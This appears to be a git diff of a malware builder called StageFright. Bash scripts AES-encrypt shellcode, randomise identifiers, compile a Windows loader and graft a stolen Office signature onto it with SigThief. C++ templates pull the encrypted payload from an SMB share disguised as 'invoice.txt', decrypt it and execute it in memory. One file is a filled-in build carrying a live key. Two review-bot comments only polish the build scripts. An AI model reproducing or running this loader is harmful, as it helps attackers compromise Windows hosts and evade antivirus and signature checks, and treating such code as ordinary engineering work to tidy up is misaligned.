+ 190 - 0
StageFright/StageFright/StageFright/SMB/SMB.sh

@@ -0,0 +1,190 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   ________  _________               
+/  ___| |                     | | /  ___|  \/  || ___ \              
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ /              
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \              
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ /              
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/               
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                                             
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMB/template.cpp StageFright/SMB/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMB/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMB/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMB/conv.py StageFright/SMB/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMB/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMB/Resources/con.py
+python3 StageFright/SMB/Resources/con.py
+#rm StageFright/SMB/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMB/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMB/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMB/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMB/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMB/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMB/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMB/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMB/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMB/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMB/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMB/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMB/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMB/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMB/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMB/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/SMB/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+
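Review bot: `rm shell*` at the end of the build globs over the caller's current directory, so any user file beginning with "shell" — including a `shellcode.bin` placed there as the prompt's example suggests — is deleted together with the temp files; write the intermediates under `tmp=$(mktemp -d)` with `trap 'rm -rf -- "$tmp"' EXIT`, or at minimum `rm -f -- shell.txt shell2.txt shell3.txt shell5.txt`. Both the `x86_64-w64-mingw32-g++` and the `sigthief.py` invocations discard stdout/stderr and are never status-checked, so "Malware Compiled" and "Signature Added" are printed even when no binary was produced and the final `mv signed$MALWARE $MALWARE` then fails; `x86_64-w64-mingw32-g++ ... || { echo "compile failed" >&2; exit 1; }` makes the failure visible. Every `fold -w ${1:-11}` reads the script's first positional argument as the width, so invoking `SMB.sh foo` sets all identifier widths to "foo" — use the literal width. The sed-substituted `StageFright/SMB/Resources/template.cpp` (containing the AES key, hostname and share) is left on disk after the build and should be removed with the other intermediates. The `read` calls lack `-r` and `$Shellcode`/`$MALWARE` are unquoted, so paths with spaces or backslashes break the `python3` and compile steps.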

+ 4 - 0
StageFright/StageFright/StageFright/SMB/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

+ 252 - 0
StageFright/StageFright/StageFright/SMB/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random7[] = KEYVALUE
+
+int main() {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+

+ 26 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/con.py


BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/invoice.txt


BIN
StageFright/StageFright/StageFright/SMBDLL/Resources/malware.dll


+ 252 - 0
StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL ohztCLrjKceS(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL EpKOpQRlB(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int rABIYwtsiD(char* Random4, unsigned int zHUdE, char* nPincKr, size_t nPincKrlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)nPincKr, (DWORD)nPincKrlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &zHUdE)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char VTOBIBvhNOZy[] =  { 0xa4, 0x49, 0xc1, 0x91, 0xfc, 0x7a, 0x55, 0x44, 0x92, 0x9a, 0xab, 0x5d, 0xb, 0x95, 0x2e, 0xd6 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    LPCWSTR szServer = L"Win11Blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ymluXTmiPBZPy;
+    SIZE_T ymluXTmiPBZPySize;
+
+    BOOL success = ohztCLrjKceS(szServer, szFilePath, &ymluXTmiPBZPy, &ymluXTmiPBZPySize);
+
+    if (success) {
+        rABIYwtsiD((char*)ymluXTmiPBZPy, ymluXTmiPBZPySize, VTOBIBvhNOZy, sizeof(VTOBIBvhNOZy));
+
+        success = EpKOpQRlB(ymluXTmiPBZPy, ymluXTmiPBZPySize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ymluXTmiPBZPySize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ymluXTmiPBZPy,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ymluXTmiPBZPy);
+    }
+
+    return success ? 0 : 1;
+}
+
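Review bot: This Resources/template.cpp is a build output of SMBDLL.sh rather than a template: the identifiers are already randomised (`ohztCLrjKceS`, `EpKOpQRlB`, `rABIYwtsiD`), the host and share names are filled in at `LPCWSTR szServer = L"Win11Blue";`, and a concrete AES key literal is baked in at `char VTOBIBvhNOZy[] = …`. Committing it together with `Resources/malware.dll`, `Resources/invoice.txt` and `Resources/con.py` places key material, a staged payload and a compiled artifact in version control, and the script overwrites all of them on its next run, so the checked-in copies will silently drift from whatever was last built. Keep only `SMBDLL/template.cpp` under source control and list the generated `Resources/` outputs in a `.gitignore`; the same applies to the parallel `SMB/Resources/` files earlier in this commit.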

+ 181 - 0
StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh

@@ -0,0 +1,181 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"          
+
+ _____ _                       _   ________  _________  ______ _      _     
+/  ___| |                     | | /  ___|  \/  || ___ \ |  _  \ |    | |    
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ / | | | | |    | |    
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \ | | | | |    | |    
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ / | |/ /| |____| |____
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/  |___/ \_____/\_____/
+                 __/ |                                                      
+                |___/                                                       
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMBDLL/template.cpp StageFright/SMBDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMBDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMBDLL/Resources/template.cpp
+
+#Generate AES Payload
